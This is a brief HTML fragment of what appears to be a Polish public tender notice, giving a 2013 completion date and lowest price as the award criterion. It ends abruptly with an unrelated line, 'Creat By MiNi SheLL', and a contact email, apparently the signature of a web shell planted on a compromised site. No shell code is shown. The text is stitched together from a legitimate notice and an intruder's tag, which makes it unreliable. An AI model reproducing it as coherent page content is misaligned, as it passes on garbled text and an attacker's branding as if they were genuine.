<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 09.07.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com